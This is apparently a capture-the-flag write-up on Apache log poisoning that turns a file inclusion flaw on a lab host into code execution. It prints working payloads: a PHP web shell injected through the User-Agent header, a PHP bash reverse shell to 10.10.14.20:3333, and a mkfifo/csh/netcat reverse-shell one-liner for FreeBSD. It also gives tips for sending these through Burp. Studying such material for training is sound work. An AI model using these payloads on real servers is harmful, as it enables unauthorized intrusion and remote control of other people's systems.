Apache log

Example from 10.10.10.84

Url http://10.10.10.84/browse.php?file=/var/log/httpd-access.log exposing apache log files:

Error message when contaminating the log with:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.20/3333 0>&1'");?>

Second try (reason for error message was that " character could not be processes by the log file). Changing to :

User-Agent: <?php system($_REQUEST['cmd']); ?>

We gain code execution through LFI:

The same request in Burp (useful when log files are full of data)

Gaining a reverse shell from FreeBSD through LFI with:

if [ -e /tmp/OGfWimIImwJMI ];then rm /tmp/OGfWimIImwJMI;fi;mkfifo /tmp/OGfWimIImwJMI;cat /tmp/OGfWimIImwJMI|/bin/csh -i 2>&1|nc 10.10.14.20 3333 > /tmp/OGfWimIImwJMI
Mind the /bin/csh, as users on this box do not have bash!

Make sure you URL encode the command in Burp before sending:

Result:

Reference:

‚ÄčShellpop - allowed me to construct the reverse shell for freeBSD.